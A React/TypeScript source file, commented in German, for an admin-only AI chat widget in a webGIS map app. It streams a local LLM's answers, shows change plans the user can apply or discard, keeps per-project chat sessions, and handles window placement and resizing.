// ============================================================
// KI-Assistent — floating chat button + frosted window on the map.
// Streams SSE from POST /api/chat (admin-only); the backend runs a
// local LLM with live webgis tool execution.
//
// Nachgemessen 28.08. — auf welchen Wegen ging ein Gespraech verloren?
//  · Schliessen/Oeffnen waehrend einer laufenden Antwort: KEIN Verlust. Der
//    Knopfzweig weiter unten ersetzt nur das Geruest, der Baustein bleibt
//    montiert, der Strom laeuft weiter. Ebenso `hidden` (Atlas) und die
//    Gate-Rueckgaben — `return null` ist kein Abbau.
//  · Bildschirmwechsel Karte -> Dashboard -> Karte: VERLUST, und zwar
//    vollstaendig. /karte (MapShell) und /project/:id (Shell) sind zwei
//    Routen mit zwei Elementen (App.tsx:263-314), der Baustein wurde also
//    abgebaut. Deshalb liegen Verlauf und Entwurf jetzt im Modul statt im
//    Baustein — s. „Sitzungen" gleich darunter.
//  · Projektwechsel: der Verlauf BLIEB, obwohl er falsch war — /karte bleibt
//    montiert, nur ?project= wechselt (KarteScreen.tsx:746 raeumt aus genau
//    diesem Grund schon Auswahl und Panel aus). Ein offener Aenderungsplan
//    aus Projekt A stand weiter mit „Anwenden" da, waehrend die Karte B
//    zeigte. Sitzungen haengen darum am Projekt.
//  · Neuladen der Seite: Verlust, und der bleibt so. Ein halb gelesener
//    Strom laesst sich nach einem Neuladen ohnehin nicht wieder aufnehmen,
//    und ein Gespraech in den Sitzungsspeicher zu legen hiesse, es haltbarer
//    zu machen als die Anmeldung.
//
// ABWAEGUNG 29.08. — der laufende STROM stirbt beim Abbau, mit Absicht.
//    Frueher brach der Abbau-Effekt ihn ab. Als Verlauf und Entwurf in den
//    Modulspeicher zogen, fiel dieser Abbruch mit weg — und mit ihm still
//    eine Sicherheitszusage. Denn ein Lauf ruft SCHREIBENDE Werkzeuge
//    (webgis_charts create/patch, webgis_update_layer, webgis_set_fields,
//    webgis_map_views): er aendert das Projekt also weiter, nachdem der
//    Nutzer den Bildschirm verlassen hat und niemand mehr sieht, was da
//    geschrieben wird — und niemand mehr „Stop" druecken kann, denn der Knopf
//    haengt am Fenster. Sicherheit schlaegt Komfort: der Abbruch ist zurueck.
//    Der Preis ist bewusst bezahlt und benannt — eine Antwort, die beim
//    Wechsel gerade laeuft, ist verloren. Verlauf und Entwurf ueberleben den
//    Wechsel weiterhin; wer die Antwort will, bleibt stehen oder fragt neu.
//    Was sichtbar zurueckbleibt: die halb geschriebene Blase steht ohne
//    Warteanzeige da und sieht fertig aus. Sie zu kennzeichnen waere neue
//    Oberflaeche und damit eine eigene Entscheidung, nicht die Beigabe hier.
// ============================================================
import { useEffect, useLayoutEffect, useRef, useState, useSyncExternalStore } from "react";
import { useQuery } from "@tanstack/react-query";
import { api } from "../../api/http";
import { load, save } from "../../lib/storage";
import { Denkloader } from "../../components/ladewerk";
import { Icon, IconBtn, Spinner } from "../../components/ui";
import { useIsAdmin, useStore } from "../../store/useStore";

interface PlanVerification {
  ok: boolean;
  warnings: string[];
  counts: Record<string, number>;
}
interface PlanCard {
  planId: string;
  summary: string | null;
  verification: PlanVerification;
}
type PlanState = "pending" | "applying" | "applied" | "discarded" | "failed";

interface ChatMsg {
  /** Objekt-Markierung aus webgis_find_features */
  map?: ChatMapSelection;
  role: "user" | "assistant";
  content: string;
  tools?: string[];
  /** Der schnelle Weg antwortet nicht, die Antwort kommt ueber den Rueckfall.
   *  Bleibt nach dem Ende stehen: sie erklaert im Nachhinein, warum es dauerte. */
  rueckfall?: boolean;
  plan?: PlanCard;
  planState?: PlanState;
  planResult?: { ok: boolean; refused?: boolean; warnings?: string[]; steps?: Array<{ step: string; ok: boolean }> };
}

const COUNT_LABELS: Record<string, string> = {
  csvUploads: "CSV-Tabellen",
  valueRelations: "Wertelisten",
  fields: "Felder",
  formTabs: "Formular-Tabs",
  style: "Stil",
  cardStats: "Kennzahlen",
  charts: "Diagramme",
};

// Fehlt ein Eintrag, steht der rohe Werkzeugname in der Blase. Genau die vier
// Verwaltungswerkzeuge hatten keinen — und die kommen jetzt, wo der Chat im
// Admin-Panel steht, am haeufigsten vor.
const TOOL_LABELS: Record<string, string> = {
  webgis_projects: "Projekte lesen",
  webgis_workflow: "Einrichtung prüfen",
  webgis_register_layer: "Layer registrieren",
  webgis_update_project: "Projekt ändern",
  webgis_find_photos: "Fotos durchsuchen",
  webgis_geraete: "Spielgeräte lesen",
  webgis_find_features: "Objekte suchen",
  webgis_layers: "Layer lesen",
  webgis_columns: "Spalten lesen",
  webgis_update_layer: "Layer ändern",
  webgis_set_fields: "Felder setzen",
  webgis_get_form: "Formular lesen",
  webgis_set_form: "Formular setzen",
  webgis_value_relations: "Wertelisten",
  webgis_aggregate: "Aggregat",
  webgis_distinct: "Distinct-Werte",
  webgis_range: "Min/Max",
  webgis_map_views: "Kartenansichten",
  webgis_set_card_stats: "Kennzahlen",
  webgis_charts: "Diagramme",
  webgis_upload_csv: "CSV-Upload",
  webgis_propose_plan: "Plan prüfen",
  webgis_style_guide: "Stil-Leitfaden",
  qgis_list: "QGIS-Dateien",
  qgis_inspect: "QGIS lesen",
};

function PlanCardView({
  msg,
  lang,
  onApply,
  onDiscard,
  onDownload,
}: {
  msg: ChatMsg;
  lang: string;
  onApply: (id: string) => void;
  onDiscard: (id: string) => void;
  onDownload: (id: string) => void;
}): React.JSX.Element | null {
  const plan = msg.plan;
  if (!plan) return null;
  const v = plan.verification;
  const state = msg.planState ?? "pending";
  const chips = Object.entries(v.counts).filter(([, n]) => n > 0);
  const de = lang === "de";

  return (
    <div style={{ width: "100%", marginTop: 4, borderRadius: 13, border: "1px solid var(--accent-soft)", background: "var(--field)", overflow: "hidden" }}>
      <div style={{ padding: "9px 12px", display: "flex", alignItems: "center", gap: 8, borderBottom: "1px solid var(--field-border)", background: "var(--accent-soft)" }}>
        <Icon name="sparkle" weight="fill" size={14} style={{ color: "var(--accent-text)" }} />
        <span style={{ fontSize: 12.5, fontWeight: 700, color: "var(--accent-text)" }}>{de ? "Änderungsplan" : "Change plan"}</span>
        <span style={{ marginLeft: "auto", fontSize: 10.5, fontWeight: 600, color: v.ok ? "var(--good)" : "var(--warn, #b8860b)" }}>
          {v.ok ? (de ? "✓ geprüft" : "✓ verified") : `${v.warnings.length} ${de ? "Hinweise" : "warnings"}`}
        </span>
      </div>
      <div style={{ padding: "10px 12px", display: "flex", flexDirection: "column", gap: 8 }}>
        {plan.summary && <div style={{ fontSize: 12.5, lineHeight: 1.5, color: "var(--text)" }}>{plan.summary}</div>}
        <div style={{ display: "flex", flexWrap: "wrap", gap: 5 }}>
          {chips.map(([k, n]) => (
            <span key={k} style={{ fontSize: 10.5, fontWeight: 600, color: "var(--text-dim)", background: "var(--bg, rgba(0,0,0,.04))", border: "1px solid var(--field-border)", borderRadius: 6, padding: "2px 7px" }}>
              {n}× {COUNT_LABELS[k] ?? k}
            </span>
          ))}
        </div>
        {v.warnings.length > 0 && state === "pending" && (
          <ul style={{ margin: 0, paddingLeft: 16, fontSize: 11.5, color: "var(--warn, #b8860b)", lineHeight: 1.5 }}>
            {v.warnings.slice(0, 6).map((w, i) => (
              <li key={i}>{w}</li>
            ))}
            {v.warnings.length > 6 && <li>…{v.warnings.length - 6} {de ? "weitere" : "more"}</li>}
          </ul>
        )}
        {state === "applied" && (
          <div style={{ fontSize: 12, fontWeight: 600, color: "var(--good)", display: "flex", alignItems: "center", gap: 6 }}>
            <Icon name="check-circle" weight="fill" size={15} /> {de ? "Angewendet" : "Applied"}
            {msg.planResult?.steps && ` · ${msg.planResult.steps.filter((s) => s.ok).length}/${msg.planResult.steps.length}`}
          </div>
        )}
        {state === "failed" && (
          <div style={{ fontSize: 12, fontWeight: 600, color: "var(--bad, #c0392b)" }}>
            {msg.planResult?.refused ? (
              <>
                ⛔ {de ? "Nicht angewendet — Verifizierung fehlgeschlagen:" : "Not applied — verification failed:"}
                <ul style={{ margin: "4px 0 0", paddingLeft: 16, fontWeight: 500 }}>
                  {(msg.planResult.warnings ?? []).slice(0, 6).map((w, i) => (
                    <li key={i}>{w}</li>
                  ))}
                </ul>
              </>
            ) : (
              <>
                ⚠ {de ? "Teilweise fehlgeschlagen" : "Partially failed"}
                {msg.planResult?.steps && ` — ${msg.planResult.steps.filter((s) => !s.ok).map((s) => s.step).join(", ")}`}
              </>
            )}
          </div>
        )}
        {(state === "pending" || state === "applying") && (
          <div style={{ display: "flex", gap: 7, alignItems: "center" }}>
            <button
              className="btn"
              disabled={state === "applying"}
              onClick={() => onApply(plan.planId)}
              style={{ fontSize: 12, fontWeight: 600, padding: "6px 13px", borderRadius: 9, background: "var(--accent)", color: "#fff", border: "none", cursor: "pointer", display: "inline-flex", alignItems: "center", gap: 6 }}
            >
              {state === "applying" ? <Spinner size={13} color="#fff" /> : <Icon name="check" size={13} />}
              {de ? "Anwenden" : "Apply"}
            </button>
            <button onClick={() => onDiscard(plan.planId)} style={{ fontSize: 12, fontWeight: 600, padding: "6px 12px", borderRadius: 9, background: "transparent", color: "var(--text-mute)", border: "1px solid var(--field-border)", cursor: "pointer" }}>
              {de ? "Verwerfen" : "Discard"}
            </button>
            <button onClick={() => onDownload(plan.planId)} title="JSON" style={{ marginLeft: "auto", fontSize: 11.5, fontWeight: 600, padding: "6px 10px", borderRadius: 9, background: "transparent", color: "var(--accent-text)", border: "1px solid var(--field-border)", cursor: "pointer", display: "inline-flex", alignItems: "center", gap: 5 }}>
              <Icon name="download-simple" size={13} /> JSON
            </button>
          </div>
        )}
        {(state === "applied" || state === "failed") && (
          <button onClick={() => onDownload(plan.planId)} style={{ alignSelf: "flex-start", fontSize: 11.5, fontWeight: 600, padding: "5px 10px", borderRadius: 9, background: "transparent", color: "var(--accent-text)", border: "1px solid var(--field-border)", cursor: "pointer", display: "inline-flex", alignItems: "center", gap: 5 }}>
            <Icon name="download-simple" size={13} /> {de ? "Plan als JSON" : "Plan as JSON"}
          </button>
        )}
      </div>
    </div>
  );
}

/** Kopieren-Knopf unter jeder Blase — Frage wie Antwort lassen sich weiterverwenden. */
function CopyBtn({ text, lang }: { text: string; lang: string }) {
  const [done, setDone] = useState(false);
  return (
    <button
      type="button"
      className="ring-focus"
      title={lang === "de" ? "Text kopieren" : "Copy text"}
      onClick={async () => {
        try {
          await navigator.clipboard.writeText(text);
          setDone(true);
          window.setTimeout(() => setDone(false), 1400);
        } catch {
          /* kein Clipboard-Zugriff (z. B. ohne HTTPS) */
        }
      }}
      style={{ display: "inline-flex", alignItems: "center", gap: 4, fontSize: 10.5, fontWeight: 600, padding: "1px 6px", borderRadius: 6, border: "none", background: "transparent", color: done ? "var(--accent-text)" : "var(--text-mute)", cursor: "pointer" }}
    >
      <Icon name={done ? "check" : "copy"} size={11} weight={done ? "bold" : "regular"} />
      {done ? (lang === "de" ? "Kopiert" : "Copied") : (lang === "de" ? "Kopieren" : "Copy")}
    </button>
  );
}

/** Auswahl, die ein Werkzeug auf die Karte legt (webgis_find_features) */
export interface ChatMapSelection {
  layerId: string;
  fids: string[];
  bbox: [number, number, number, number] | null;
  title: string | null;
}

// ============================================================
// Sitzungen — der Zustand des Gespraechs liegt AUSSERHALB von React.
//
// Warum ueberhaupt: der Baustein wird beim Bildschirmwechsel abgebaut (s.
// Kopf). Laege der Verlauf in useState, waere er dann weg. Die
// Abbruchsteuerung liegt aus einem zweiten Grund hier und nicht im Baustein:
// „Stop", das Abmelden, „Neu starten" UND der Abbau greifen alle auf DENSELBEN
// Lauf zu, und busy muss danach in derselben Ablage zurueckfallen, aus der die
// Warteblase liest.
//
// Je Projekt eine Sitzung, denn ein Verlauf aus Projekt A ist in B nicht
// bloss nutzlos, sondern falsch: er ginge als Vorgeschichte mit der neuen
// Projekt-ID an das Backend, und ein offener Aenderungsplan aus A bliebe mit
// „Anwenden" stehen. Der OFFENE Zustand haengt dagegen weder am Projekt noch
// am Bildschirm: sonst verschwaende das Fenster genau bei den beiden
// Wechseln, bei denen es bleiben soll. Wer es zumacht, macht es ueberall zu.
// ============================================================
interface ChatSitzung {
  /** readonly, weil die Leersitzung ein GETEILTES Array haelt (s. LEERE_SITZUNG) */
  msgs: readonly ChatMsg[];
  /** ungesendeter Entwurf — ueberlebt den Bildschirmwechsel mit */
  input: string;
  busy: boolean;
  ac: AbortController | null;
}

/** Gemeinsamer Anfangswert. Wird nie veraendert, nur kopiert — so ist er fuer
 *  jedes noch unbenutzte Projekt DASSELBE Objekt. Ein je Abruf frisch gebautes
 *  triebe useSyncExternalStore in eine Endlosschleife.
 *
 *  Das Array wird MIT eingefroren und der Typ traegt das: genau dieses eine
 *  Array liegt in jedem noch unbenutzten Projekt gleichzeitig, ein push() darauf
 *  schriebe die Nachricht also in ALLE. Der Freeze der Huelle schuetzte bisher
 *  nur die Felder, die niemand anfasst, und liess das geteilte Array offen —
 *  und der Cast auf den schreibbaren Typ nahm dem Compiler die Chance, es zu
 *  sagen. Beides ist weg. */
const KEINE_MSGS: readonly ChatMsg[] = Object.freeze([]);
const LEERE_SITZUNG: Readonly<ChatSitzung> = Object.freeze({ msgs: KEINE_MSGS, input: "", busy: false, ac: null });
const sitzungen = new Map<string, ChatSitzung>();
let offen = false;
const hoerer = new Set<() => void>();

function abonnieren(h: () => void): () => void {
  hoerer.add(h);
  return () => void hoerer.delete(h);
}
function melden(): void {
  for (const h of [...hoerer]) h();
}
function sitzung(key: string): Readonly<ChatSitzung> {
  return sitzungen.get(key) ?? LEERE_SITZUNG;
}
/** Immer eine NEUE Sitzung ablegen, nie die alte anfassen: useSyncExternalStore
 *  vergleicht auf Objektgleichheit, eine Aenderung im Innern saehe es nicht.
 *
 *  Liefert der Reducer seine Eingabe unveraendert zurueck, wird NICHT
 *  geschrieben. Bisher schrieb setzeSitzung immer — und legte damit bei einem
 *  Nichts-Patch den Schluessel NEU an: der Epilog eines abgebrochenen Laufs
 *  erweckte nach dem Abmelden die eben geloeschte Sitzung wieder (leer, aber
 *  vorhanden). Nebenbei spart der Kurzschluss jedem Hoerer den grundlosen
 *  Weckruf. */
function setzeSitzung(key: string, fn: (s: Readonly<ChatSitzung>) => ChatSitzung): void {
  const vorher = sitzung(key);
  const nachher = fn(vorher);
  if (nachher === vorher) return;
  sitzungen.set(key, nachher);
  melden();
}
/** Wann zuletzt vorgewaermt wurde — der Server hat sein eigenes Gedaechtnis,
 *  aber ein Aufruf je Aufklappen genuegt und spart die Runde ganz. */
let letztesWaermen = 0;
const WAERM_ABSTAND_MS = 4 * 60_000;

function setzeOffen(v: boolean): void {
  if (offen === v) return;
  offen = v;
  /* Beim AUFKLAPPEN das Modell anstossen, nicht erst beim Absenden. Zwischen
     "Chat geoeffnet" und "Frage abgeschickt" vergehen Sekunden bis Minuten, in
     denen niemand wartet — genau die Zeit, die der Rueckfall-Rechner fuer einen
     Modellwechsel braucht. Im Prod-Log stand "qwen3.6-27b | starting", waehrend
     die Erste-Byte-Frist von 90 s ablief; die Nutzerin bekam nach anderthalb
     Minuten nichts.
     Fehler werden verschluckt: es ist eine Vorbereitung, kein Auftrag. Demo-
     Sitzungen bekommen dort ohnehin eine Abfuhr, und das ist richtig so. */
  if (v && Date.now() - letztesWaermen > WAERM_ABSTAND_MS) {
    letztesWaermen = Date.now();
    void fetch("/api/chat/warm", { method: "POST", credentials: "include" }).catch(() => undefined);
  }
  melden();
}
function patchLast(key: string, fn: (m: ChatMsg) => ChatMsg): void {
  setzeSitzung(key, (s) => ({ ...s, msgs: s.msgs.map((m, i) => (i === s.msgs.length - 1 ? fn(m) : m)) }));
}
function patchPlan(key: string, planId: string, fn: (m: ChatMsg) => ChatMsg): void {
  setzeSitzung(key, (s) => ({ ...s, msgs: s.msgs.map((m) => (m.plan?.planId === planId ? fn(m) : m)) }));
}

/**
 * Die Karten-Markierung geht an den GERADE montierten Bildschirm — und nur
 * dann, wenn der dasselbe Projekt zeigt, in dem gefragt wurde (Pruefung in
 * sendeAn). Der Eintrag traegt sein Projekt deshalb bei sich.
 *
 * Eine Markierung, die niemand annehmen darf, ist nicht verloren: sie steht in
 * der Nachricht, und der Knopf „auf der Karte" in der Blase holt sie nach.
 */
let kartenRuf: { projekt: string; ruf: (sel: ChatMapSelection) => void } | null = null;

/**
 * Abmelden raeumt die Sitzungen ab.
 *
 * Ohne das waere der Modulzustand ein Leck: `setAuth(null)` laedt die Seite
 * NICHT neu (AvatarMenu.tsx:34), die naechste Anmeldung im selben Tab saehe
 * also das Gespraech der vorigen.
 */
const abmeldeHoerer = useStore.subscribe((st, vorher) => {
  if (st.auth?.id === vorher.auth?.id) return;
  for (const s of sitzungen.values()) s.ac?.abort();
  sitzungen.clear();
  offen = false;
  melden();
});
// Vite ersetzt beim Speichern das Modul, baut das alte aber nicht ab: ohne
// dispose bliebe je Speicherung ein Hoerer des ALTEN Moduls am Store haengen,
// der weiter dessen Sitzungen leert. Sichtbar wird das als Verlauf, der beim
// Entwickeln bei JEDEM Speichern verschwindet — man sucht dann den Fehler in
// der Persistenz, wo keiner ist.
if (import.meta.hot) import.meta.hot.dispose(() => abmeldeHoerer());

/**
 * Eine Frage stellen und den Strom lesen — an die SITZUNG gebunden, nicht an
 * den Baustein. Wer waehrend der Antwort den Bildschirm wechselt, findet sie
 * beim Zurueckkommen fertig vor; wer das Projekt wechselt, laesst sie in
 * ihrem Projekt weiterlaufen, statt sie in das neue zu schreiben.
 */
async function sendeAn(key: string, projectId: string, text: string, lang: string): Promise<void> {
  if (!text || sitzung(key).busy) return;
  const history: ChatMsg[] = [...sitzung(key).msgs, { role: "user", content: text }];
  const ac = new AbortController();
  setzeSitzung(key, (s) => ({ ...s, msgs: [...history, { role: "assistant", content: "", tools: [] }], busy: true, ac }));
  try {
    const r = await fetch("/api/chat", {
      method: "POST",
      credentials: "include",
      headers: { "content-type": "application/json" },
      body: JSON.stringify({ messages: history.map(({ role, content }) => ({ role, content })), projectId }),
      signal: ac.signal,
    });
    if (!r.ok || !r.body) throw new Error(`HTTP ${r.status}`);
    const reader = r.body.getReader();
    const dec = new TextDecoder();
    let buf = "";
    for (;;) {
      const { done, value } = await reader.read();
      if (done) break;
      buf += dec.decode(value, { stream: true });
      let i: number;
      while ((i = buf.indexOf("\n\n")) !== -1) {
        const block = buf.slice(0, i);
        buf = buf.slice(i + 2);
        for (const line of block.split("\n")) {
          if (!line.startsWith("data: ")) continue;
          let ev: { type: string; content?: string; code?: string; name?: string; message?: string; planId?: string; summary?: string | null; verification?: PlanVerification; layerId?: string; fids?: string[]; bbox?: [number, number, number, number] | null; title?: string | null };
          try {
            ev = JSON.parse(line.slice(6)) as typeof ev;
          } catch {
            continue;
          }
          if (ev.type === "token" && ev.content) patchLast(key, (m) => ({ ...m, content: m.content + ev.content }));
          else if (ev.type === "tool" && ev.name) patchLast(key, (m) => ({ ...m, tools: [...(m.tools ?? []), ev.name!] }));
          else if (ev.type === "hinweis" && ev.code === "rueckfall") patchLast(key, (m) => ({ ...m, rueckfall: true }));
          else if (ev.type === "map" && ev.layerId && Array.isArray(ev.fids)) {
            const sel: ChatMapSelection = { layerId: ev.layerId, fids: ev.fids, bbox: ev.bbox ?? null, title: ev.title ?? null };
            patchLast(key, (m) => ({ ...m, map: sel }));
            // NUR ausliefern, wenn der montierte Baustein DASSELBE Projekt
            // zeigt.
            //
            // Den Bildschirmwechsel deckt seit E4 schon der Abbruch beim Abbau
            // ab: ein Lauf ueberlebt den Baustein nicht mehr, der ihn gestellt
            // hat. Was er ueberlebt, ist der PROJEKTWECHSEL — /karte bleibt
            // dabei montiert, nur ?project= wechselt. Und gemessen vergehen bis
            // zu 25 s zwischen Frage und Kartenereignis: ohne diese Pruefung
            // navigierte die Antwort aus Projekt A in eine Karte, die laengst B
            // zeigt (auf drei der vier Einbauorte ist onMap ein
            // navigate("/karte?…")). Die Auswahl ist dabei NICHT verloren: sie
            // steht in der Nachricht, und der Knopf „auf der Karte" in der Blase
            // holt sie nach — dann aber, wenn der Nutzer es will.
            if (kartenRuf && kartenRuf.projekt === key) kartenRuf.ruf(sel);
          } else if (ev.type === "plan" && ev.planId && ev.verification)
            patchLast(key, (m) => ({ ...m, plan: { planId: ev.planId!, summary: ev.summary ?? null, verification: ev.verification! }, planState: "pending" }));
          else if (ev.type === "error") patchLast(key, (m) => ({ ...m, content: m.content + `\n⚠ ${ev.message ?? "Fehler"}` }));
        }
      }
    }
  } catch (e) {
    if (!(e instanceof DOMException && e.name === "AbortError"))
      patchLast(key, (m) => ({ ...m, content: m.content || (lang === "de" ? "⚠ Assistent nicht erreichbar." : "⚠ Assistant unreachable.") }));
  } finally {
    // Aufraeumen gehoert ins finally: stolpert der Fehlerzweig selbst, bliebe
    // busy sonst fuer immer stehen — und damit das Fenster tot, denn dann geht
    // weder Senden noch der Stop-Knopf, der nur abbricht, was laengst
    // abgebrochen ist.
    //
    // Geschrieben wird nur, wenn es die Sitzung ueberhaupt noch GIBT und noch
    // DIESER Lauf gemeint ist: „Neu starten" hat sie womoeglich geleert, das
    // Abmelden sie geloescht — und ein Epilog, der sie danach wieder anlegt,
    // liesse das Gespraech des vorigen Nutzers als leeren Schluessel
    // auferstehen. Beide Schranken zusammen: has() sagt es hier direkt,
    // setzeSitzung schneidet den unveraenderten Fall zusaetzlich ab.
    if (sitzungen.has(key)) setzeSitzung(key, (s) => (s.ac === ac ? { ...s, busy: false, ac: null } : s));
  }
}

/** Breite des Datenpanels, des Chatfensters und der Randabstand — eine Quelle. */
const PANEL_W = 384;
const CHAT_W = 380;
const CHAT_H = 540;
const EDGE = 16;

/**
 * Wie weit rueckt das Fenster nach links, wenn rechts das Datenpanel aufgeht?
 *
 * Das war bisher eine Ja/Nein-Frage: passt CHAT_W neben PANEL_W (ab
 * 384 + 380 + 16 = 780 px), rueckte das Fenster um die VOLLE Panelbreite, sonst
 * um gar nichts. Beide Zweige sind gemeldete Stoerungen: das volle Rueckten kam
 * ohne Uebergang, also als Sprung in einem Bild; das „gar nichts" liess das
 * Fenster genau dort stehen, wo das eben geoeffnete Panel aufgeht.
 *
 * Die einfachste ehrliche Loesung ist, die Frage stetig zu beantworten: das
 * Fenster rueckt so weit, wie Platz ist — bei 780 px und mehr die volle
 * Panelbreite, darunter der Rest, der bleibt, und erst wenn gar keiner mehr da
 * ist, steht es wie heute bei EDGE. Verschwinden kann es dabei nicht: es traegt
 * zIndex 35, die Panel-Huelle daneben 30 (KarteScreen.tsx:3344) — es liegt also
 * OBEN und bleibt greifbar, statt unter dem Panel zu verschwinden.
 */
function ausweichRechts(): number {
  return Math.max(EDGE, Math.min(PANEL_W, window.innerWidth - CHAT_W - EDGE));
}

/**
 * Ab dieser Schirmbreite ist Ziehen ueberhaupt sinnvoll: darunter deckelt
 * maxWidth (calc(100vw - 32px)) das Fenster auf die ganze Breite minus der
 * beiden 16-px-Raender — es gaebe kein Wohin. Auf dem Telefon bleibt deshalb
 * alles, wie es heute ist: kein Ziehen, kein Groessenaendern, keine gemerkte
 * Lage.
 */
const ZIEH_AB = CHAT_W + 2 * EDGE;

/** Vom Nutzer gesetzte Lage: Abstand von rechts und unten plus Groesse.
 *  Rechts/unten, weil das Fenster ohnehin dort verankert ist — die gezogene
 *  Lage rechnet damit in derselben Waehrung wie das Ausweichen darueber. */
interface FensterLage {
  r: number;
  b: number;
  w: number;
  h: number;
}
/** „move" = Kopfzeile, die uebrigen sind die Groessenzonen an den Kanten. */
type ZiehArt = "move" | "w" | "n" | "s" | "nw";

/** EINE Lage fuer alle vier Einbauorte und alle Projekte: es gibt EIN Fenster,
 *  und der Nutzer hat es EINMAL hingestellt. Den spg.-Praefix setzt storage.ts. */
const LAGE_KEY = "chatFenster";

/**
 * Kleinstmass, aus den Massen dieser Datei gerechnet statt geraten. Hoehe:
 *   Kopf     13 + 11 Polster + 28 (IconBtn box) + 1 Rand              = 53
 *   Eingabe  10 + 12 Polster + 1 Rand + 38 Textfeld (2*10 Polster aus
 *            .inp, 2*1 Rand, eine Zeile zu 13 px)                     = 61
 *   Verlauf  14 + 6 Polster + eine Blase mit drei Zeilen
 *            (2*8 Polster, 2*1 Rand, 3 * 13*1,55 = 60,5)              = 99
 * Breite: der Kopf braucht 2*16 Polster, 17 Funken, rund 85 px Titel, zwei
 * Knoepfe zu 28 und vier Luecken zu 9 — zusammen 226. Die 260 lassen der Blase
 * (88 % von 260 - 28 Polster) noch rund 204 px Zeile.
 */
const MIN_W = 260;
const MIN_H = 213;

/** Breite der unsichtbaren Groessenzonen und der Eckzone. 6 px, weil die Zone
 *  sonst in die Knoepfe und in das Textfeld hineinreicht. */
const ZONEN_B = 6;
const ZONEN_ECKE = 14;

/**
 * Die Groessenzonen. Die RECHTE Kante hat bewusst keine: dort laeuft der
 * Balken der Verlaufsliste (base.css: ::-webkit-scrollbar width 7px), eine
 * Zone darueber naehme ihn dem Nutzer weg. Sie waere auch entbehrlich — rechts
 * sitzt der Anker, breiter wird das Fenster nach LINKS.
 */
const ZONEN: Record<Exclude<ZiehArt, "move">, React.CSSProperties> = {
  w: { left: 0, top: ZONEN_ECKE, bottom: 0, width: ZONEN_B, cursor: "ew-resize" },
  n: { top: 0, left: ZONEN_ECKE, right: 0, height: ZONEN_B, cursor: "ns-resize" },
  s: { bottom: 0, left: 0, right: 0, height: ZONEN_B, cursor: "ns-resize" },
  nw: { top: 0, left: 0, width: ZONEN_ECKE, height: ZONEN_ECKE, cursor: "nwse-resize" },
};
/** Zeiger, der waehrend des Ziehens am ganzen Dokument haengt — sonst wechselt
 *  er, sobald der Zeiger die schmale Zone verlaesst. */
const ZONEN_ZEIGER: Record<ZiehArt, string> = { move: "grabbing", w: "ew-resize", n: "ns-resize", s: "ns-resize", nw: "nwse-resize" };

const spanne = (v: number, lo: number, hi: number): number => Math.min(Math.max(v, lo), Math.max(lo, hi));
const gleicheLage = (a: FensterLage, b: FensterLage): boolean => a.r === b.r && a.b === b.b && a.w === b.w && a.h === b.h;

/**
 * Masse des Bezugsrahmens, auf den sich `right`/`bottom` des Fensters
 * beziehen — die Grenzen, in die geklemmt wird.
 *
 * Bei `fixed` ist das das Sichtfenster; bei `absolute` der naechste
 * positionierte Vorfahr, auf der Karte also die Kartenwurzel
 * (KarteScreen.tsx:2704, position:absolute inset:0) — und die ist NICHT das
 * Sichtfenster, denn ueber ihr sitzt der Seitenkopf. offsetParent ist bei
 * `fixed` von sich aus null, dieser Fall faellt also richtig auf das
 * Sichtfenster zurueck.
 */
function rahmen(el: HTMLElement | null): { w: number; h: number } {
  const p = el?.offsetParent as HTMLElement | null;
  // documentElement.clientWidth statt window.innerWidth: innerWidth zaehlt den
  // Rollbalken mit, der feste Bezugsrahmen nicht. Der Unterschied sind rund
  // 15 px, und um genau die haette das Fenster links aus dem Bild geschoben
  // werden koennen, obwohl es „geklemmt" war.
  if (!p) return { w: document.documentElement.clientWidth, h: document.documentElement.clientHeight };
  // clientWidth/clientHeight und nicht getBoundingClientRect: Bezugsrahmen
  // einer absoluten Lage ist der POLSTERKASTEN des Vorfahren — genau das, was
  // clientWidth misst (ohne Rand, ohne Rollbalken). Auf der Kartenwurzel ist
  // beides dasselbe, auf einem gepolsterten Vorfahren nicht mehr.
  return { w: p.clientWidth, h: p.clientHeight };
}

/**
 * Ins Bild klemmen — und zwar GANZ hinein, nicht bloss die Kopfzeile: die
 * schaerfere Regel ist die einfachere, und ein halb herausstehendes Fenster
 * schneidet die Eingabezeile ab. Erst die Groesse (nie groesser als der
 * Rahmen), dann die Lage — umgekehrt klemmte man eine Lage auf eine Groesse
 * fest, die gleich darauf noch schrumpft.
 */
function klemme(l: FensterLage, rw: number, rh: number): FensterLage {
  const w = spanne(l.w, MIN_W, rw);
  const h = spanne(l.h, MIN_H, rh);
  return { w, h, r: spanne(l.r, 0, rw - w), b: spanne(l.b, 0, rh - h) };
}

/** Gemerkte Lage lesen. Vier Zahlen oder nichts — ein halber Eintrag (fremder
 *  Schluessel, alte Fassung) waere schlimmer als keiner. Geklemmt wird er
 *  nicht hier, sondern nach dem Aufsetzen: erst dann steht der Rahmen fest. */
function leseLage(): FensterLage | null {
  const l = load<FensterLage | null>(LAGE_KEY, null);
  if (!l || typeof l !== "object") return null;
  return [l.r, l.b, l.w, l.h].every((n) => typeof n === "number" && Number.isFinite(n)) ? l : null;
}

export function ChatWidget({ shifted = false, fixed = false, hidden = false, projectId, ask, onMap, onConsumed, launcher = true, contextLabel, launcherBottom = 16 }: { shifted?: boolean; fixed?: boolean; /** true = nur unsichtbar (Atlas-Modus); das Widget bleibt montiert und behaelt seinen Verlauf */ hidden?: boolean; projectId?: string; ask?: { q: string; t: number } | null; onMap?: (sel: ChatMapSelection) => void; /** gereichte Frage ist verarbeitet — der Aufrufer setzt sie auf null zurueck */ onConsumed?: () => void; /** false = kein schwebender Knopf (Karte: die Suchleiste oeffnet den Chat) */ launcher?: boolean; /** Name des Bezugsprojekts im Kopf. Nur dort setzen, wo die SEITE selbst kein Projekt zeigt (Uebersicht, Admin) — sonst wuerde der Chat etwas wiederholen, was daneben schon steht. */ contextLabel?: string; /** Abstand des schwebenden Knopfs vom unteren Rand. 16 ist der Kartenwert (dort liegt nichts darunter); auf den Shell-Seiten muss er die Fusszeile freihalten. */ launcherBottom?: number }): React.JSX.Element | null {
  const isAdmin = useIsAdmin();
  const boxRef = useRef<HTMLDivElement>(null);
  // Das Fenster haengt IMMER rechts, solange der Nutzer es nicht selbst
  // hingestellt hat. Dem Datenpanel weicht es so weit aus, wie Platz ist —
  // gerechnet in ausweichRechts(), nicht geraten (die alten 900 px passten
  // nicht zu diesen Massen). Auf schmalen Schirmen schob right:384 es frueher
  // fast komplett aus dem Bild nach links (Regression 22.08.).
  const [ausweich, setAusweich] = useState(() => ausweichRechts()); // Wrapper: sonst koennte TS die Funktion selbst als State lesen
